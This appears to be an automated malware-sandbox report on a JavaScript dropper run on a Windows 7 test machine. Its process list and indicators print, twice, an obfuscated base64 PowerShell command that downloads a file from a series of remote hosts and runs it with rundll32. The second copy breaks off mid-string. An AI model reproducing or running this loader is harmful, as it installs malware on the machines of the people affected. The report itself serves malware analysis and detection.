Category | Machine | Started | Completed |
---|---|---|---|
FILE | s1_win7_x6401 | May 19, 2023, 6:06 p.m. | May 19, 2023, 6:08 p.m. |
-
-
wscript.exe "C:\Windows\System32\wscript.exe" "C:\Users\test22\AppData\Local\Temp\Icuv.js" kickup ostracophorousVoleries
2688-
powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBhAHIAYQBzAHMAbwB3AHMAUwB1AGIAZAB1AGUAZABuAGUAcwBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEASABNAEEAYgBRAEIAdgBBAEcAOABBAFkAdwBCAG8AQQBIAE0AQQBMAGcAQgBuAEEARwBFAEEAYgBRAEIAbABBAEgATQBBAFkAQQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAGsAQQBPAFEAQQB1AEEARABZAEEATwBBAEEAdQBBAEQARQBBAE0AQQBBAHkAQQBDADQAQQBNAFEAQQB5AEEARABRAEEAIgA7AGkAZgAgACgAKABHAGUAdAAtAEkAdABlAG0AIAAtAFAAYQB0AGgAIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwApAC4ATABlAG4AZwB0AGgAIAAtAGcAZQAgADIANgA2ADMAMwAzACkAewBwAG8AdwBlAHIAcwBoAGUAbABsACAALQBlAG4AYwBvAGQAZQBkAGMAbwBtAG0AYQBuAGQAIAAiAGMAdwBCADAAQQBHAEUAQQBjAGcAQgAwAEEAQwBBAEEAYwBnAEIAMQBBAEcANABBAFoAQQBCAHMAQQBHAHcAQQBNAHcAQQB5AEEAQwBBAEEASgBBAEIAbABBAEcANABBAGQAZwBBADYAQQBGAEEAQQBjAGcAQgB2AEEARwBjAEEAYwBnAEIAaABBAEcAMABBAFIAQQBCAGgAQQBIAFEAQQBZAFEAQgBjAEEARwB3AEEAYQBRAEIAMABBAEcAVQBBAGMAZwBCAGgAQQBIAFEAQQBaAFEAQgB6AEEARQAwAEEAYgB3AEIAdQBBAEcAYwBBAGIAdwBCAHYAQQBIAE0AQQBaAFEAQgB6AEEAQwA0AEEAYwB3AEIAMQBBAEcASQBBAGQAQQBCAHkAQQBHADgAQQBZAHcAQgBvAEEARwBFAEEAYgBnAEIAMABBAEcAVQBBAGMAZwBCAHAAQQBHAE0AQQBMAEEAQgBVAEEARwBVAEEAYwB3AEIAMABBAEQAcwBBAFIAUQBCADQAQQBIAEEAQQBjAGcAQgBsAEEASABNAEEAYwB3AEIAcQBBAEgATQBBACIAOwAkAGYAbwByAGUAZABlAHMAawAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMABBAEQAawBBAEwAZwBBAHgAQQBEAGsAQQBNAEEAQQB1AEEARABFAEEATgBBAEEANABBAEMANABBAE0AZwBBAHkAQQBEAEUAQQAiADsAYgByAGUAYQBrADsAfQBFAHgAcAByAGUAcwBzAGoAcwA7AH0AIABjAGEAdABjAGgAIAB7ACQASAB5AGEAbAB1AHIAbwBuAGkAYwBPAGYAZgBsAG8AYQBkAGUAZAAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEYAVQBBAGIAZwBCAGsAQQBHAFUAQQBjAGcAQgBtAEEARwB3AEEAYgB3AEIAMwBBAEcAawBBAGIAZwBCAG4AQQBDADQAQQBjAHcAQgBoAEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCAHcAQQBHAGsAQQBiAGcAQgBuAEEARwB3AEEAWgBRAEIAVABBAEcARQBBAGIAQQBCAHAAQQBHAE0AQQBiAHcAQgB5AEEARwA0AEEAYQBRAEIAaABBAEMANABBAFoAZwBCADEAQQBIAFEAQQBZAGcAQgB2AEEARwB3AEEAcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHADAAQQBZAFEAQgB5AEEARwBrAEEAZABBAEIAaABBAEcAYwBBAFoAUQBBAHUAQQBHADAAQQBiAHcAQgB0AEEAQQA9AD0AcQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBFAE0AQQBiAHcAQgB1AEEARwBZAEEAWgBRAEIAegBBAEgATQBBAFoAUQBCAHkAQQBFAEkAQQBZAFEAQgB1AEEARwBzAEEAYwB3AEIAcABBAEcARQBBAGMAdwBBAHUAQQBHAEkAQQBZAFEAQgA1AEEARwBVAEEAYwBnAEIAdQBBAEEAPQA9ACIAOwAkAHIAZQBjAHUAZQBpAGwAbABlAG0AZQBuAHQAUAByAG8AcwBwAGUAYwB0AGkAbgBnACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATQBRAEEANABBAEMANABBAE0AUQBBAHkAQQBEAEEAQQBMAGcAQQAyAEEARABFAEEATABnAEEAeABBAEQAawBBAE4AQQBBAD0AbgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFUAQQBNAGcAQQB1AEEARABFAEEATwBRAEEAMQBBAEMANABBAE0AUQBBADIAQQBEAFkAQQBMAGcAQQB4AEEARABnAEEATwBRAEEAPQBuAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAWQBBAGEAUQBCAGkAQQBIAEkAQQBhAFEAQgB1AEEARwBFAEEAZABBAEIAbABBAEYAUQBBAGEAUQBCAHUAQQBHAGMAQQBiAEEAQgBsAEEASABJAEEATABnAEIAagBBAEcAOABBACIAOwB9AH0AJABTAHUAYwBjAG8AdQByAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQASQBBAE0AUQBBAHUAQQBEAEkAQQBNAEEAQQAzAEEAQwA0AEEATQBnAEEAMABBAEQAWQBBAEwAZwBBAHgAQQBEAE0AQQBNAEEAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBRAEEAYQBRAEIAdwBBAEcAZwBBAGUAUQBCAGwAQQBIAE0AQQBhAFEAQgB6AEEARQBNAEEAYgB3AEIAdABBAEcAMABBAFoAUQBCAHUAQQBHAFEAQQBZAFEAQgBrAEEARwA4AEEAYwBnAEEAdQBBAEgAQQBBAFkAUQBCAHkAQQBHAGsAQQBjAHcAQQA9AHcAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABFAEEATwBBAEEANQBBAEMANABBAE8AQQBBADMAQQBDADQAQQBNAFEAQQB4AEEARABBAEEATABnAEEAeABBAEQAVQBBAE0AUQBBAD0AdwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGMAQQBaAFEAQgB1AEEARwBVAEEAWQBRAEIAcwBBAEcAOABBAFoAdwBCAHAAQQBHAE0AQQBVAHcAQgBvAEEARwA4AEEAZAB3AEIAaQBBAEcAOABBAFkAUQBCADAAQQBDADQAQQBaAGcAQgBoAEEASABNAEEAYQBBAEIAcABBAEcAOABBAGIAZwBBAD0AIgA7ACQAQgByAGEAaQBuAHcAYQBzAGgAZQByAHMAUAByAGUAYwBvAG4AZABlAG0AbgBzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABVAEEATQBnAEEAdQBBAEQASQBBAE0AUQBBAHgAQQBDADQAQQBNAGcAQQB6AEEARABjAEEATABnAEEAeQBBAEQATQBBAE0AdwBBAD0ASQA9AG0AYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBKAEEARwAwAEEAYgBRAEIAaABBAEcANABBAGQAQQBCAHMAQQBHAFUAQQBMAGcAQgBzAEEARwBFAEEAYgBnAEIAawBBAEEAPQA9AEkAPQBtAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEIAawBBAEcAVQBBAFkAdwBCAGgAQQBIAFEAQQBlAFEAQgBzAEEARgBNAEEAZABRAEIAaQBBAEgAWQBBAGIAdwBCAGoAQQBHAEUAQQBiAEEAQQB1AEEARwBNAEEAWQB3AEEAPQAiADsA"
2812
-
-
Name | Response | Post-Analysis Lookup |
---|---|---|
No hosts contacted. |
IP Address | Status | Action |
---|---|---|
No hosts contacted. |
Suricata Alerts
No Suricata Alerts
Suricata TLS
No Suricata TLS
file | C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk |
cmdline | powershell -encodedcommand "JABBAHUAcgBvAGMAaABzACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARABJAEEATgBBAEEAMgBBAEMANABBAE0AUQBBAHkAQQBEAEUAQQBMAGcAQQB4AEEARABZAEEATwBRAEEAdQBBAEQAUQBBAE0AQQBBAD0AcwBmAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgASQBBAFoAUQBCADMAQQBHAEUAQQBiAEEAQgBzAEEARwA4AEEAZAB3AEIAVwBBAEcAawBBAFkAUQBCAHUAQQBHAFEAQQBaAFEAQgB5AEEAQwA0AEEAYwBnAEIAbABBAEgAQQBBAFkAUQBCAHAAQQBIAEkAQQAiADsAJABEAGkAZwByAGUAcwBzAGkAbwBuAGEAcgB5AEEAbgBvAHAAbABhACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARwBZAEEAYgB3AEIAeQBBAEcAVQBBAFoAdwBCAGgAQQBHAHcAQQBiAEEAQgBsAEEASABJAEEAZQBRAEEAdQBBAEgAUQBBAGIAdwBCAGsAQQBHAEUAQQBlAFEAQQA9AEoARABhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBIAFUAQQBiAGcAQgBqAEEASABJAEEAWgBRAEIAaABBAEgAUQBBAFoAUQBBAHUAQQBIAE0AQQBkAFEAQgB5AEEARwBjAEEAWgBRAEIAeQBBAEgAawBBACIAOwBTAHQAYQByAHQALQBTAGwAZQBlAHAAIAAtAFMAZQBjAG8AbgBkAHMAIAA5ADsAJABwAHUAcABpAGwAbABhAGcAZQBHAGkAZwBhAG4AdABpAGMAaQBkAGUAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBAHgAQQBEAFkAQQBNAGcAQQB1AEEARABFAEEATwBBAEEAeQBBAEMANABBAE8AUQBBADEAQQBDADQAQQBNAFEAQQB3AEEARABBAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADUAQQBEAFEAQQBMAGcAQQB4AEEARABNAEEATwBRAEEAdQBBAEQARQBBAE4AdwBBADEAQQBDADQAQQBNAGcAQQAxAEEARABJAEEAUABWAFIAVwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB3AEEAQwA0AEEATQBnAEEAMABBAEQAawBBAEwAZwBBAHkAQQBEAE0AQQBOAFEAQQB1AEEARABJAEEATgBRAEEAeQBBAEEAPQA9ACIAOwAkAE0AaQBjAHIAbwBjAGgAZQBtAGkAYwBhAGwAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBGAEkAQQBaAFEAQgBqAEEARwBnAEEAWQBRAEIAeQBBAEcAYwBBAFoAUQBCAGgAQQBHAEkAQQBiAEEAQgBsAEEAQwA0AEEAWQB3AEIAaABBAEgATQBBAGEAUQBCAHUAQQBHADgAQQB6AFIAUwBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAGcAQQA1AEEAQwA0AEEATQBRAEEANQBBAEQASQBBAEwAZwBBAHkAQQBEAEUAQQBNAEEAQQB1AEEARABJAEEATQBBAEEAMgBBAEEAPQA9ACIAOwAkAFQAcgBlAG0AZQBuAGQAbwB1AHMAbgBlAHMAcwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEgARQBBAGQAUQBCAGgAQQBIAEkAQQBkAEEAQgBoAEEARgBRAEEAYQBRAEIAdQBBAEcAWQBBAGQAUQBCAHMAQQBDADQAQQBZAGcAQgAxAEEARwBrAEEAYgBBAEIAawBBAEEAPQA9AHIAQwBKAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEQAUQBBAE4AZwBBAHUAQQBEAEkAQQBNAEEAQQB6AEEAQwA0AEEATQBRAEEAeQBBAEQAYwBBAEwAZwBBAHgAQQBEAEEAQQBNAGcAQQA9ACIAOwAkAHgAZQBuAG8AYwByAHkAcwB0AGkAYwAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAMwBBAEQAYwBBAEwAZwBBADUAQQBEAEUAQQBMAGcAQQA0AEEARABVAEEATABnAEEAeABBAEQASQBBAE4AQQBBAHYAQQBIAEEAQQBUAGcAQgBZAEEARgBrAEEATAB3AEIAeQBBAEQARQBBAFYAQQBCAG0AQQBHAGMAQQBiAFIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQQB4AEEARABjAEEATgBnAEEAdQBBAEQARQBBAE0AZwBBADAAQQBDADQAQQBNAFEAQQA1AEEARABnAEEATABnAEEAeQBBAEQARQBBAE4AQQBBAHYAQQBIAEkAQQBRAFEAQgBCAEEARQA4AEEAZABRAEIAMgBBAEQAWQBBAEwAdwBBAHcAQQBHADgAQQBhAGcAQgA1AEEARwBZAEEAVgBnAEIAVABBAEEAPQA9AGIAUgBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBBADMAQQBEAGMAQQBMAGcAQQA1AEEARABFAEEATABnAEEANABBAEQAYwBBAEwAZwBBAHkAQQBEAEkAQQBOAGcAQQB2AEEARABJAEEAYQB3AEIAVgBBAEYAawBBAE0AUQBCAEcAQQBDADgAQQBaAFEAQgBJAEEASABjAEEAYQBRAEIAawBBAEcANABBAFEAdwBBAD0AIgA7AGYAbwByAGUAYQBjAGgAIAAoACQAcgBhAHMAaABlAHMAVAByAGEAbgBzAGwAdQBjAGUAbgBjAGkAZQBzACAAaQBuACAAJAB4AGUAbgBvAGMAcgB5AHMAdABpAGMAIAAtAHMAcABsAGkAdAAgACIAYgBSACIAKQAgAHsAJABmAGEAcgByAGkAcwBpAHQAZQAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUAdwBBAGIAdwBCADIAQQBHAEUAQQBaAHcAQgBsAEEASABNAEEATABnAEIAbwBBAEcARQBBAGIAUQBCAGkAQQBIAFUAQQBjAGcAQgBuAEEAQQA9AD0AIgA7AHQAcgB5ACAAewAkAFMAbwBwAGgAaQBzAHQAaQBjAGEAbABsAHkAVQBuAGcAdQBhAHIAYQBuAHQAZQBlAGQAIAA9ACAAIgBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBHAGsAQQBiAFEAQgB3AEEASABJAEEAWgBRAEIAegBBAEcARQBBAEwAZwBCADEAQQBIAE0AQQB4AGEAQQBCADAAQQBIAFEAQQBjAEEAQQA2AEEAQwA4AEEATAB3AEEAeABBAEQAQQBBAE0AUQBBAHUAQQBEAFUAQQBNAHcAQQB1AEEARABZAEEATgBRAEEAdQBBAEQARQBBAE0AUQBBADIAQQBBAD0APQAiADsAJABnAHIAYQB2AGUAZwBhAHIAdABoACAAPQAgACIAYQBBAEIAMABBAEgAUQBBAGMAQQBBADYAQQBDADgAQQBMAHcAQgBzAEEARwBVAEEAZABnAEIAbABBAEcAdwBBAGIAUQBCAGgAQQBHADQAQQBVAHcAQgB3AEEARwBFAEEAWgBBAEIAcABBAEgAZwBBAFoAUQBCAHoAQQBDADQAQQBZAHcAQgBsAEEARwA4AEEAeQBhAEEAQgAwAEEASABRAEEAYwBBAEIAegBBAEQAbwBBAEwAdwBBAHYAQQBEAEUAQQBNAFEAQQB6AEEAQwA0AEEATQBRAEEAMwBBAEQAUQBBAEwAZwBBAHkAQQBEAFEAQQBPAEEAQQB1AEEARABJAEEATgBBAEEAegBBAEEAPQA9AHkAYQBBAEIAMABBAEgAUQBBAGMAQQBCAHoAQQBEAG8AQQBMAHcAQQB2AEEARQBFAEEAWgBBAEIAaABBAEgAQQBBAGQAQQBCAHAAQQBIAFkAQQBaAFEAQgBzAEEASABrAEEAVgBnAEIAcABBAEcAOABBAGIAQQBCAGwAQQBHADQAQQBZAHcAQgBsAEEAQwA0AEEAYwB3AEIAdgBBAEcAWQBBAGQAQQBCADMAQQBHAEUAQQBjAGcAQgBsAEEAQQA9AD0AeQBhAEEAQgAwAEEASABRAEEAYwBBAEEANgBBAEMAOABBAEwAdwBCADEAQQBHADQAQQBjAGcAQgAxAEEARwBZAEEAWgBnAEIAcwBBAEcAVQBBAFoAQQBCAEUAQQBHAG8AQQBaAFEAQgBpAEEARwBVAEEAYgBBAEIAegBBAEMANABBAGQAQQBCAHYAQQBIAGsAQQBjAHcAQQA9ACIAOwAkAHIAZQBtAGUAbQBiAHIAYQBuAGMAZQBBAGwAZQB4AGEAbgBkAGUAcgAgAD0AIAAiAGEAQQBCADAAQQBIAFEAQQBjAEEAQgB6AEEARABvAEEATAB3AEEAdgBBAEUARQBBAGQAZwBCAHAAQQBHAGMAQQBZAFEAQgAwAEEARwBVAEEATABnAEIAbABBAEgATQBBAGQAQQBCAGgAQQBIAFEAQQBaAFEAQQA9ACIAOwAkAG0AYQBuAGcAYQBuAG8AcABoAHkAbABsAGkAdABlACAAPQAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AFUAbgBpAGMAbwBkAGUALgBHAGUAdABTAHQAcgBpAG4AZwAoAFsAUwB5AHMAdABlAG0ALgBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQBzAGgAZQBzAFQAcgBhAG4AcwBsAHUAYwBlAG4AYwBpAGUAcwApACkAOwBpAHcAcgAgACQAbQBhAG4AZwBhAG4AbwBwAGgAeQBsAGwAaQB0AGUAIAAtAE8AIAAkAGUAbgB2ADoAUAByAG8AZwByAGEAbQBEAGEAdABhAFwAbABpAHQAZQByAGEAdABlAHMATQBvAG4AZwBvAG8AcwBlAHMALgBzAHUAYgB0AHIAbwBjAGgAYQBuAHQAZQByAGkAYwA7ACQAYwBh